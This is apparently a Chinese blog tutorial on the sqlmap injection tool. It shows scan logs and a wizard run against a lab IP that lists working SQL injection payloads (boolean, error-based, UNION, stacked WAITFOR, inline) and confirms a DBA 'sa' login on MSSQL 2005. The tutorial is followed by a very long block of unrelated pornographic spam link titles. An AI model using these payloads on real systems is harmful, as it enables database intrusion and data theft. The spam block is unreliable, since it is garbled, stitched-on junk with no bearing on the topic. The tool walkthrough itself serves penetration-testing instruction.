[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [xx:xx:24] [INFO] target URL appears to have 3 columns in query [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [...]

初級用戶向?qū)?shù)

參數(shù):--wizard 面向初級用戶的參數(shù),可以一步一步教你如何輸入針對目標注入。

$ python sqlmap.py --wizard sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 11:25:26 Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1 Enumeration (--banner/--current-user/etc). Please choose: [1] Basic (default) [2] Smart [3] All > 1 sqlmap is running, please wait.. heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 25 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2986=2986 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)) --- web server operating system: Windows XP web application technology: ASP, Microsoft IIS 5.1 back-end DBMS operating system: Windows XP Service Pack 2 back-end DBMS: Microsoft SQL Server 2005 banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) --- current user:????'sa' current database:????'testdb' current user is DBA:????True [*] shutting down at 11:25:52

轉(zhuǎn)載于:https://www.cnblogs.com/xinxianquan/p/8824167.html

總結(jié)

以上是生活随笔為你收集整理的信息嗅探的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

国产特级毛片aaaaaaa高清 | 日本熟妇乱子伦xxxx | 国产又爽又黄又刺激的视频 | 午夜精品久久久内射近拍高清 | 国产精品美女久久久网av | 67194成是人免费无码 | 东北女人啪啪对白 | 亚洲精品综合一区二区三区在线 | 国产精品第一区揄拍无码 | 久久97精品久久久久久久不卡 | 中文精品久久久久人妻不卡 | 国产香蕉尹人综合在线观看 | 精品成人av一区二区三区 | 欧美人与禽zoz0性伦交 | 狠狠色噜噜狠狠狠狠7777米奇 | 久久久久亚洲精品男人的天堂 | 亚洲色偷偷男人的天堂 | 亚洲国产精品成人久久蜜臀 | 99精品国产综合久久久久五月天 | 成年美女黄网站色大免费视频 | 少妇太爽了在线观看 | 亚洲国产一区二区三区在线观看 | 少妇被黑人到高潮喷出白浆 | 一本久道久久综合婷婷五月 | 老司机亚洲精品影院无码 | 国产高潮视频在线观看 | 亚洲欧美日韩国产精品一区二区 | 超碰97人人射妻 | 99久久亚洲精品无码毛片 | 欧美 丝袜 自拍 制服 另类 | 国产片av国语在线观看 | 久久精品人妻少妇一区二区三区 | 秋霞特色aa大片 | 日本精品人妻无码77777 天堂一区人妻无码 | 国产真人无遮挡作爱免费视频 | 嫩b人妻精品一区二区三区 | 亚洲男人av天堂午夜在 | 人妻尝试又大又粗久久 | 狠狠色噜噜狠狠狠狠7777米奇 | 色情久久久av熟女人妻网站 | 精品无码国产一区二区三区av | 亚洲国产一区二区三区在线观看 | 亚洲精品午夜国产va久久成人 | 久久五月精品中文字幕 | 老司机亚洲精品影院无码 | 宝宝好涨水快流出来免费视频 | 欧洲vodafone精品性 | 无码国产激情在线观看 | 亚洲人亚洲人成电影网站色 | 99久久精品日本一区二区免费 | 亚洲男人av天堂午夜在 | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 少妇性l交大片欧洲热妇乱xxx | 亚洲日本一区二区三区在线 | 一本一道久久综合久久 | 国产手机在线αⅴ片无码观看 | 一二三四社区在线中文视频 | 男女作爱免费网站 | 国产亚洲精品久久久久久久 | 国产97在线 | 亚洲 | 人人爽人人澡人人人妻 | 欧美三级不卡在线观看 | 天海翼激烈高潮到腰振不止 | 久久精品女人天堂av免费观看 | 色综合天天综合狠狠爱 | 99久久精品午夜一区二区 | 亚洲自偷自偷在线制服 | 久久天天躁夜夜躁狠狠 | 国产精品美女久久久久av爽李琼 | 国产精华av午夜在线观看 | 国产乱人伦app精品久久 国产在线无码精品电影网 国产国产精品人在线视 | 国产人妻精品一区二区三区不卡 | 亚洲熟妇色xxxxx欧美老妇y | 欧美老熟妇乱xxxxx | 在线观看欧美一区二区三区 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 好爽又高潮了毛片免费下载 | 精品国产乱码久久久久乱码 | 熟女体下毛毛黑森林 | 成人精品视频一区二区三区尤物 | a在线亚洲男人的天堂 | 人人爽人人爽人人片av亚洲 | 午夜时刻免费入口 | 国产女主播喷水视频在线观看 | 精品人妻中文字幕有码在线 | 国产xxx69麻豆国语对白 | 亚洲aⅴ无码成人网站国产app | 乱码午夜-极国产极内射 | 无码精品人妻一区二区三区av | 日本xxxx色视频在线观看免费 | 福利一区二区三区视频在线观看 | 国产精品久久久久久亚洲毛片 | 久久www免费人成人片 | 美女张开腿让人桶 | 精品久久久无码人妻字幂 | 精品乱子伦一区二区三区 | a在线亚洲男人的天堂 | 国产真实伦对白全集 | 1000部啪啪未满十八勿入下载 | 成 人 免费观看网站 | 97精品人妻一区二区三区香蕉 | 色一情一乱一伦一区二区三欧美 | 熟妇人妻无乱码中文字幕 | 九月婷婷人人澡人人添人人爽 | 日本精品高清一区二区 | 国产综合久久久久鬼色 | 午夜精品久久久久久久 | 狠狠色噜噜狠狠狠狠7777米奇 | 一本色道久久综合狠狠躁 | 国产另类ts人妖一区二区 | 欧美三级a做爰在线观看 | 黑人巨大精品欧美黑寡妇 | 亚洲成a人片在线观看无码 | 国产人妻精品一区二区三区 | 欧美亚洲日韩国产人成在线播放 | 精品人妻中文字幕有码在线 | √8天堂资源地址中文在线 | 精品久久8x国产免费观看 | 亚洲大尺度无码无码专区 | 日韩精品无码免费一区二区三区 | 久久国产36精品色熟妇 | av无码不卡在线观看免费 | 奇米影视7777久久精品人人爽 | 黄网在线观看免费网站 | 国产精品二区一区二区aⅴ污介绍 | 2020久久超碰国产精品最新 | 色欲人妻aaaaaaa无码 | 日韩av无码一区二区三区 | 久久精品99久久香蕉国产色戒 | 亚洲国产av精品一区二区蜜芽 | 澳门永久av免费网站 | 自拍偷自拍亚洲精品被多人伦好爽 | 特级做a爰片毛片免费69 | 国产精品内射视频免费 | 色噜噜亚洲男人的天堂 | 欧美日本精品一区二区三区 | 欧美日韩一区二区免费视频 | 色婷婷欧美在线播放内射 | 国产成人久久精品流白浆 | 亚洲一区二区三区香蕉 | 成在人线av无码免费 | 亚洲国产精品成人久久蜜臀 | 东京热男人av天堂 | 青青草原综合久久大伊人精品 | 成人无码视频免费播放 | 97久久精品无码一区二区 | 天堂亚洲免费视频 | 国产激情一区二区三区 | 狠狠亚洲超碰狼人久久 | 国内老熟妇对白xxxxhd | 国产特级毛片aaaaaa高潮流水 | 久久久久久久久蜜桃 | 亚洲综合精品香蕉久久网 | 欧美性生交活xxxxxdddd | 性色欲网站人妻丰满中文久久不卡 | 久久久久久久人妻无码中文字幕爆 | 午夜精品一区二区三区的区别 | 久久婷婷五月综合色国产香蕉 | 99riav国产精品视频 | 成 人 网 站国产免费观看 | 国产亚洲精品久久久闺蜜 | 免费观看黄网站 | 国产成人无码午夜视频在线观看 | 国产成人无码av片在线观看不卡 | 天天做天天爱天天爽综合网 | 中文字幕色婷婷在线视频 | 久久精品女人天堂av免费观看 | 牲欲强的熟妇农村老妇女 | 久久精品国产精品国产精品污 | 黑人玩弄人妻中文在线 | 夜夜夜高潮夜夜爽夜夜爰爰 | 国产精品久久久久久无码 | 精品人妻中文字幕有码在线 | 大地资源网第二页免费观看 | 久久国产自偷自偷免费一区调 | 男女作爱免费网站 | 中文字幕av无码一区二区三区电影 | 久久国语露脸国产精品电影 | 7777奇米四色成人眼影 | 免费无码午夜福利片69 | 久久精品99久久香蕉国产色戒 | 欧美日韩在线亚洲综合国产人 | aⅴ亚洲 日韩 色 图网站 播放 | 男女爱爱好爽视频免费看 | 性色欲情网站iwww九文堂 | 国产亚洲精品久久久闺蜜 | 99在线 | 亚洲 | 国产精品亚洲专区无码不卡 | 亚洲国产精品一区二区第一页 | 国产精品毛片一区二区 | 任你躁在线精品免费 | 中文字幕av无码一区二区三区电影 | 国产激情艳情在线看视频 | 激情内射亚州一区二区三区爱妻 | 无遮挡国产高潮视频免费观看 | 欧美熟妇另类久久久久久多毛 | 国产精品理论片在线观看 | 野外少妇愉情中文字幕 | 东京热无码av男人的天堂 | 日本高清一区免费中文视频 | 爽爽影院免费观看 | 一个人免费观看的www视频 | 日本熟妇浓毛 | 欧美老妇与禽交 | 少妇厨房愉情理9仑片视频 | 精品一区二区三区波多野结衣 | 成 人 免费观看网站 | 免费播放一区二区三区 | 亚洲国产欧美国产综合一区 | 麻豆人妻少妇精品无码专区 | aⅴ在线视频男人的天堂 | 亚洲区小说区激情区图片区 | 精品久久久久久亚洲精品 | 亚洲第一无码av无码专区 | 小sao货水好多真紧h无码视频 | 老司机亚洲精品影院无码 | 午夜免费福利小电影 | 国产97在线 | 亚洲 | 精品一区二区不卡无码av | 亚洲精品美女久久久久久久 | 亚洲aⅴ无码成人网站国产app | 中文无码伦av中文字幕 | 天天拍夜夜添久久精品 | 亚洲の无码国产の无码影院 | 欧洲美熟女乱又伦 | 婷婷丁香五月天综合东京热 | 中文字幕 人妻熟女 | 国产午夜无码视频在线观看 | 娇妻被黑人粗大高潮白浆 | 99视频精品全部免费免费观看 | 无码任你躁久久久久久久 | 日本一卡2卡3卡四卡精品网站 | 99精品无人区乱码1区2区3区 | 强伦人妻一区二区三区视频18 | 国产成人一区二区三区别 | 又黄又爽又色的视频 | 成人三级无码视频在线观看 | 亚拍精品一区二区三区探花 | 纯爱无遮挡h肉动漫在线播放 | 天天做天天爱天天爽综合网 | 帮老师解开蕾丝奶罩吸乳网站 | 精品成在人线av无码免费看 | 国产亚洲美女精品久久久2020 | 免费观看又污又黄的网站 | 精品久久综合1区2区3区激情 | 免费观看又污又黄的网站 | 久久无码中文字幕免费影院蜜桃 | 久久综合久久自在自线精品自 | 国产成人人人97超碰超爽8 | 在线亚洲高清揄拍自拍一品区 | 欧美真人作爱免费视频 | 中文字幕色婷婷在线视频 | 亚洲区欧美区综合区自拍区 | 欧美国产亚洲日韩在线二区 | 国产精品亚洲五月天高清 | 青青青爽视频在线观看 | 女人被男人躁得好爽免费视频 | 岛国片人妻三上悠亚 | 久久综合网欧美色妞网 | 久久久久亚洲精品男人的天堂 | 人妻插b视频一区二区三区 | 欧美性黑人极品hd | 无码精品人妻一区二区三区av | 四虎永久在线精品免费网址 | 天下第一社区视频www日本 | 狠狠躁日日躁夜夜躁2020 | 伊人色综合久久天天小片 | 欧美丰满熟妇xxxx | 久久成人a毛片免费观看网站 | 免费人成网站视频在线观看 | 2020久久超碰国产精品最新 | 中国女人内谢69xxxxxa片 | 香港三级日本三级妇三级 | 噜噜噜亚洲色成人网站 | 国产精品二区一区二区aⅴ污介绍 | 天天av天天av天天透 | 色欲人妻aaaaaaa无码 | 又大又黄又粗又爽的免费视频 | 日日噜噜噜噜夜夜爽亚洲精品 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 真人与拘做受免费视频 | 国产成人亚洲综合无码 | 天堂无码人妻精品一区二区三区 | 免费乱码人妻系列无码专区 | 欧美日韩久久久精品a片 | 色综合视频一区二区三区 | 亚洲小说图区综合在线 | 午夜男女很黄的视频 | 色老头在线一区二区三区 | 荫蒂被男人添的好舒服爽免费视频 | 色窝窝无码一区二区三区色欲 | 国产熟妇高潮叫床视频播放 | 男女性色大片免费网站 | 久久综合给合久久狠狠狠97色 | 日本乱人伦片中文三区 | 欧洲美熟女乱又伦 | 伊人色综合久久天天小片 | 国产午夜亚洲精品不卡下载 | 国产极品视觉盛宴 | 中文字幕久久久久人妻 | 极品尤物被啪到呻吟喷水 | 亚洲人成影院在线观看 | 精品欧洲av无码一区二区三区 | 色噜噜亚洲男人的天堂 | 久久久亚洲欧洲日产国码αv | 少妇的肉体aa片免费 | 18黄暴禁片在线观看 | 国产午夜无码视频在线观看 | 玩弄中年熟妇正在播放 | 亚洲の无码国产の无码影院 | 麻豆av传媒蜜桃天美传媒 | 在线a亚洲视频播放在线观看 | 亚洲热妇无码av在线播放 | 亚洲狠狠色丁香婷婷综合 | 国产精品内射视频免费 | 最近中文2019字幕第二页 | 无码av中文字幕免费放 | 乱人伦人妻中文字幕无码久久网 | 天堂а√在线中文在线 | 成 人 网 站国产免费观看 | 国産精品久久久久久久 | 一本色道久久综合亚洲精品不卡 | 欧美日韩色另类综合 | 日本护士xxxxhd少妇 | 亚洲乱码国产乱码精品精 | 人人妻在人人 | 男女性色大片免费网站 | 久久午夜夜伦鲁鲁片无码免费 | 97se亚洲精品一区 | 永久免费精品精品永久-夜色 | 欧美freesex黑人又粗又大 | 亚洲天堂2017无码中文 | 国产精品-区区久久久狼 | 福利一区二区三区视频在线观看 | www成人国产高清内射 | 欧美精品免费观看二区 | 一本精品99久久精品77 | 亚洲国产欧美日韩精品一区二区三区 | 女人高潮内射99精品 | 少妇一晚三次一区二区三区 | 国产高潮视频在线观看 | 久久精品国产日本波多野结衣 | 我要看www免费看插插视频 | 在线观看欧美一区二区三区 | 亚洲中文字幕久久无码 | 久久97精品久久久久久久不卡 | 狠狠色丁香久久婷婷综合五月 | 国产手机在线αⅴ片无码观看 | 日本精品人妻无码免费大全 | 午夜无码人妻av大片色欲 | a片免费视频在线观看 | 国产成人一区二区三区在线观看 | 国产午夜无码精品免费看 | 亚洲人成人无码网www国产 | 国产精品久久久午夜夜伦鲁鲁 | 无码国产色欲xxxxx视频 | 强开小婷嫩苞又嫩又紧视频 | 久久视频在线观看精品 | 日韩欧美群交p片內射中文 | 国产激情精品一区二区三区 | 欧美喷潮久久久xxxxx | 亚洲精品一区二区三区在线观看 | 一本精品99久久精品77 | 久久99热只有频精品8 | 国产9 9在线 | 中文 | 精品厕所偷拍各类美女tp嘘嘘 | av在线亚洲欧洲日产一区二区 | 香蕉久久久久久av成人 | 亚洲狠狠色丁香婷婷综合 | 97久久精品无码一区二区 | 日欧一片内射va在线影院 | 国产做国产爱免费视频 | 久久久久久av无码免费看大片 | 成人无码影片精品久久久 | 亚洲成av人片在线观看无码不卡 | 在线观看国产午夜福利片 | 九九综合va免费看 | 内射巨臀欧美在线视频 | 人人妻人人澡人人爽欧美一区九九 | 青春草在线视频免费观看 | 国产精品久久久久影院嫩草 | a在线观看免费网站大全 | 初尝人妻少妇中文字幕 | 亚洲va欧美va天堂v国产综合 | 小泽玛莉亚一区二区视频在线 | 搡女人真爽免费视频大全 | 国产特级毛片aaaaaa高潮流水 | 亚洲精品成人av在线 | 亚洲а∨天堂久久精品2021 | 精品人妻中文字幕有码在线 | 久久无码中文字幕免费影院蜜桃 | 高清无码午夜福利视频 | 精品一区二区不卡无码av | 97se亚洲精品一区 | 亚洲成av人综合在线观看 | 国产成人无码区免费内射一片色欲 | 人妻与老人中文字幕 | 国产成人无码专区 | 亚洲狠狠色丁香婷婷综合 | 国产精品无码成人午夜电影 | 一本久道久久综合狠狠爱 | 久久精品国产大片免费观看 | 无码午夜成人1000部免费视频 | 亚洲精品久久久久avwww潮水 | 中国大陆精品视频xxxx | 俺去俺来也www色官网 | 亚洲中文字幕在线无码一区二区 | 少妇太爽了在线观看 | 亚洲一区二区三区四区 | 少妇愉情理伦片bd | 在线亚洲高清揄拍自拍一品区 | 沈阳熟女露脸对白视频 | 国产精品18久久久久久麻辣 | 麻豆国产人妻欲求不满谁演的 | 精品人妻人人做人人爽夜夜爽 | 久久婷婷五月综合色国产香蕉 | 精品久久久无码人妻字幂 | 欧美刺激性大交 | 亚洲精品一区二区三区在线观看 | 伊人久久大香线蕉午夜 | 水蜜桃色314在线观看 | 性欧美大战久久久久久久 | 久久久久久久女国产乱让韩 | 少妇性俱乐部纵欲狂欢电影 | 18无码粉嫩小泬无套在线观看 | 欧美黑人性暴力猛交喷水 | 中文字幕亚洲情99在线 | 一区二区三区高清视频一 | 亚洲一区二区三区在线观看网站 | 色狠狠av一区二区三区 | 久久综合香蕉国产蜜臀av | 青草青草久热国产精品 | 欧美日韩综合一区二区三区 | 日韩在线不卡免费视频一区 | 黑人巨大精品欧美一区二区 | 亚洲另类伦春色综合小说 | 特大黑人娇小亚洲女 | 色综合久久久无码网中文 | 亚洲日本va中文字幕 | 欧美大屁股xxxxhd黑色 | 亚洲成a人一区二区三区 | 成人免费无码大片a毛片 | 中文字幕无码日韩欧毛 | 蜜桃视频韩日免费播放 | 帮老师解开蕾丝奶罩吸乳网站 | 欧洲熟妇精品视频 | 好屌草这里只有精品 | 国产人妻人伦精品1国产丝袜 | 麻豆国产97在线 | 欧洲 | 四十如虎的丰满熟妇啪啪 | 久青草影院在线观看国产 | 麻豆成人精品国产免费 | 国产精品va在线播放 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 欧美亚洲国产一区二区三区 | 亚洲小说图区综合在线 | 亚洲精品综合五月久久小说 | 午夜性刺激在线视频免费 | 国产午夜亚洲精品不卡下载 | 人妻熟女一区 | 99国产精品白浆在线观看免费 | 日本在线高清不卡免费播放 | 丰满少妇女裸体bbw | 国产精品高潮呻吟av久久 | 国产办公室秘书无码精品99 | 少妇久久久久久人妻无码 | 国产一区二区三区日韩精品 | 亚洲gv猛男gv无码男同 | 高潮毛片无遮挡高清免费 | 国产精品亚洲一区二区三区喷水 | 精品国偷自产在线 | 一本久道高清无码视频 | 国产香蕉尹人综合在线观看 | 国产成人无码区免费内射一片色欲 | 国产精品多人p群无码 | 国产日产欧产精品精品app | 久久精品人妻少妇一区二区三区 | 奇米影视7777久久精品人人爽 | 亚洲狠狠婷婷综合久久 | 国产精品国产三级国产专播 | 午夜性刺激在线视频免费 | 欧美丰满老熟妇xxxxx性 | 一本久道久久综合狠狠爱 | 久久久av男人的天堂 | 久久久久人妻一区精品色欧美 | 亚洲精品国产品国语在线观看 | 亚洲乱码国产乱码精品精 | 久久综合给久久狠狠97色 | 人妻少妇精品久久 | 久久精品中文字幕大胸 | 人妻无码αv中文字幕久久琪琪布 | 漂亮人妻洗澡被公强 日日躁 | 最近的中文字幕在线看视频 | 丰满人妻精品国产99aⅴ | 亚洲日韩av一区二区三区四区 | 亚洲精品国产第一综合99久久 | 三级4级全黄60分钟 | 丝袜美腿亚洲一区二区 | 三上悠亚人妻中文字幕在线 | 欧美人与禽zoz0性伦交 | 国产激情一区二区三区 | 日韩精品a片一区二区三区妖精 | 亚洲 a v无 码免 费 成 人 a v | 4hu四虎永久在线观看 | 亚洲成av人在线观看网址 | 色综合天天综合狠狠爱 | 领导边摸边吃奶边做爽在线观看 | 国产真实夫妇视频 | 亚洲精品国产精品乱码视色 | 精品无码成人片一区二区98 | 少妇无套内谢久久久久 | 久久综合狠狠综合久久综合88 | 波多野结衣高清一区二区三区 | 久久久亚洲欧洲日产国码αv | 亚洲 欧美 激情 小说 另类 | 亚洲日本va午夜在线电影 | 少妇一晚三次一区二区三区 | 性做久久久久久久免费看 | 日韩av无码一区二区三区不卡 | 亚洲成a人片在线观看日本 | 欧洲熟妇精品视频 | 国产xxx69麻豆国语对白 | 曰本女人与公拘交酡免费视频 | 欧美日韩一区二区三区自拍 | 乌克兰少妇xxxx做受 | 六月丁香婷婷色狠狠久久 | 欧美放荡的少妇 | 国产真人无遮挡作爱免费视频 | 99久久精品国产一区二区蜜芽 | 精品国精品国产自在久国产87 | 精品 日韩 国产 欧美 视频 | 久久久久久久人妻无码中文字幕爆 | 国产真实乱对白精彩久久 | 无遮挡啪啪摇乳动态图 | 日本精品久久久久中文字幕 | 国产亚洲精品久久久久久 | 日韩在线不卡免费视频一区 | 欧美午夜特黄aaaaaa片 | 中国女人内谢69xxxxxa片 | 一个人看的视频www在线 | 东京热无码av男人的天堂 | 久久久久久久久蜜桃 | 国产精华av午夜在线观看 | 久久国产精品精品国产色婷婷 | 亚洲精品国产a久久久久久 | 国产人成高清在线视频99最全资源 | 国产精品内射视频免费 | 精品 日韩 国产 欧美 视频 | 嫩b人妻精品一区二区三区 | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 国内精品久久久久久中文字幕 | 2020最新国产自产精品 | 露脸叫床粗话东北少妇 | 狠狠躁日日躁夜夜躁2020 | 精品无码av一区二区三区 | 国产午夜精品一区二区三区嫩草 | a在线观看免费网站大全 | 俺去俺来也www色官网 | yw尤物av无码国产在线观看 | 久久亚洲日韩精品一区二区三区 | 久久久久久久久蜜桃 | 亚洲成a人片在线观看日本 | 红桃av一区二区三区在线无码av | 真人与拘做受免费视频一 | 国产无遮挡吃胸膜奶免费看 | 国产亚洲精品精品国产亚洲综合 | 人人妻人人澡人人爽人人精品 | 午夜精品久久久久久久久 | www国产亚洲精品久久网站 | 精品人人妻人人澡人人爽人人 | а天堂中文在线官网 | 国产三级久久久精品麻豆三级 | 欧美 亚洲 国产 另类 | 久久无码专区国产精品s | 成人影院yy111111在线观看 | 亚洲小说春色综合另类 | 日韩亚洲欧美精品综合 | 蜜桃av抽搐高潮一区二区 | 人妻夜夜爽天天爽三区 | 真人与拘做受免费视频 | 色老头在线一区二区三区 | 亚洲色偷偷偷综合网 | 99久久无码一区人妻 | 亚洲 激情 小说 另类 欧美 | 丰满少妇熟乱xxxxx视频 | √天堂中文官网8在线 | 日日天干夜夜狠狠爱 | 99精品无人区乱码1区2区3区 | 国产精品怡红院永久免费 | 牲交欧美兽交欧美 | 久久久无码中文字幕久... | 国产精品亚洲综合色区韩国 | 真人与拘做受免费视频一 | 欧美三级a做爰在线观看 | 国产va免费精品观看 | 三级4级全黄60分钟 | 在线天堂新版最新版在线8 | 97久久超碰中文字幕 | 麻豆蜜桃av蜜臀av色欲av | 久久国产精品_国产精品 | 人人妻人人澡人人爽欧美精品 | 性生交大片免费看女人按摩摩 | 日日摸天天摸爽爽狠狠97 | 无码人妻丰满熟妇区毛片18 | 一本精品99久久精品77 | 亚洲aⅴ无码成人网站国产app | 欧美性黑人极品hd | 国产又粗又硬又大爽黄老大爷视 | 国产精品99爱免费视频 | 久久婷婷五月综合色国产香蕉 | 99麻豆久久久国产精品免费 | 免费观看激色视频网站 | 色综合久久中文娱乐网 | 亚洲区欧美区综合区自拍区 | 欧美阿v高清资源不卡在线播放 | 激情国产av做激情国产爱 | 午夜男女很黄的视频 | 欧美日本日韩 | 国产激情精品一区二区三区 | 日日橹狠狠爱欧美视频 | 性生交大片免费看女人按摩摩 | 亚洲精品综合一区二区三区在线 | 夜先锋av资源网站 | 骚片av蜜桃精品一区 | 欧美一区二区三区 | 国内精品九九久久久精品 | 久久亚洲精品成人无码 | 少女韩国电视剧在线观看完整 | 97久久超碰中文字幕 | 久热国产vs视频在线观看 | 女高中生第一次破苞av | 国产无av码在线观看 | 国产亚洲精品久久久久久 | 97夜夜澡人人双人人人喊 | 无套内谢老熟女 | 亚洲国产精品久久久天堂 | 国产成人精品必看 | 国产亚av手机在线观看 | 亚洲欧美国产精品专区久久 | 男女下面进入的视频免费午夜 | 国产精品a成v人在线播放 | 久久精品人妻少妇一区二区三区 | 国产电影无码午夜在线播放 | 精品 日韩 国产 欧美 视频 | a在线观看免费网站大全 | 久久久久国色av免费观看性色 | 台湾无码一区二区 | 鲁一鲁av2019在线 | 亚洲国产精品无码一区二区三区 | 香港三级日本三级妇三级 | 99er热精品视频 | 玩弄少妇高潮ⅹxxxyw | 久久亚洲日韩精品一区二区三区 | 帮老师解开蕾丝奶罩吸乳网站 | 亚洲国产成人a精品不卡在线 | 蜜桃视频韩日免费播放 | 日本免费一区二区三区最新 | 亚洲人亚洲人成电影网站色 | 成人av无码一区二区三区 | 国产精品第一区揄拍无码 | 久久综合网欧美色妞网 | 国产色视频一区二区三区 | 久久99精品国产麻豆蜜芽 | 无套内谢的新婚少妇国语播放 | 国产亚洲精品久久久久久久久动漫 | 国产国语老龄妇女a片 | 中国女人内谢69xxxxxa片 | 欧美黑人性暴力猛交喷水 | 伦伦影院午夜理论片 | 欧美阿v高清资源不卡在线播放 | 久久久精品欧美一区二区免费 | 无码帝国www无码专区色综合 | 国产欧美亚洲精品a | 蜜桃av抽搐高潮一区二区 | 久久99精品久久久久久动态图 | 成熟女人特级毛片www免费 | 国产亚洲人成a在线v网站 | 欧美人与物videos另类 | 日本又色又爽又黄的a片18禁 | 精品无码一区二区三区爱欲 | 久久国产精品二国产精品 | 丝袜足控一区二区三区 | 久久久久成人片免费观看蜜芽 | 人妻中文无码久热丝袜 | 无码毛片视频一区二区本码 | 99久久久无码国产精品免费 | 装睡被陌生人摸出水好爽 | 日韩在线不卡免费视频一区 | 国产艳妇av在线观看果冻传媒 | 国产极品美女高潮无套在线观看 | 少妇愉情理伦片bd | 久久精品人妻少妇一区二区三区 | 中文字幕乱码中文乱码51精品 | 久久国语露脸国产精品电影 | 亚洲区欧美区综合区自拍区 | 无套内谢老熟女 | 亚洲 另类 在线 欧美 制服 | 无码av免费一区二区三区试看 | 国产精华av午夜在线观看 | 少妇性荡欲午夜性开放视频剧场 | 久久99久久99精品中文字幕 | 国产精品久久久久影院嫩草 | 免费无码一区二区三区蜜桃大 | 国产免费久久精品国产传媒 | 精品日本一区二区三区在线观看 | 婷婷五月综合缴情在线视频 | 麻豆果冻传媒2021精品传媒一区下载 | 国产sm调教视频在线观看 | 亚洲精品中文字幕乱码 | 欧美国产日产一区二区 | 窝窝午夜理论片影院 | 中文字幕乱妇无码av在线 | 国产色视频一区二区三区 | 国产精品美女久久久网av | 欧美大屁股xxxxhd黑色 | 正在播放东北夫妻内射 | 东京热一精品无码av | 色爱情人网站 | 一二三四在线观看免费视频 | 日本xxxx色视频在线观看免费 | 久久99精品国产麻豆蜜芽 | 波多野结衣av在线观看 | 国产精品久久久久影院嫩草 | 麻花豆传媒剧国产免费mv在线 | 国产人成高清在线视频99最全资源 | ass日本丰满熟妇pics | 国产亚洲tv在线观看 | 日韩av激情在线观看 | 国产av久久久久精东av | 久久99久久99精品中文字幕 | 欧美日韩一区二区免费视频 | 丰满少妇人妻久久久久久 | 午夜理论片yy44880影院 | 成年美女黄网站色大免费视频 | 极品嫩模高潮叫床 | 男女爱爱好爽视频免费看 | 又大又硬又黄的免费视频 | 国产精品资源一区二区 | 在线天堂新版最新版在线8 | 麻豆国产人妻欲求不满谁演的 | 又色又爽又黄的美女裸体网站 | a片在线免费观看 | 中文字幕乱码人妻无码久久 | 国产偷自视频区视频 | 久久精品女人天堂av免费观看 | 狠狠cao日日穞夜夜穞av | 国产又粗又硬又大爽黄老大爷视 | 久久精品一区二区三区四区 | 在线欧美精品一区二区三区 | 国产精品无码一区二区三区不卡 | 亚洲色欲久久久综合网东京热 | 精品无码成人片一区二区98 | 成人无码影片精品久久久 | 少妇性l交大片欧洲热妇乱xxx | 日日麻批免费40分钟无码 | 亚洲第一无码av无码专区 | 国产女主播喷水视频在线观看 | 中文无码伦av中文字幕 | 亚洲国产精品无码久久久久高潮 | 国产内射爽爽大片视频社区在线 | 久久精品国产亚洲精品 | 最新国产乱人伦偷精品免费网站 | 无码av岛国片在线播放 | 成熟人妻av无码专区 | 少妇高潮喷潮久久久影院 | 亚洲综合久久一区二区 | 亚洲精品中文字幕 | 国产情侣作爱视频免费观看 | 成年女人永久免费看片 | 亚洲国产精品无码久久久久高潮 | 国产精品久久久久久亚洲毛片 | 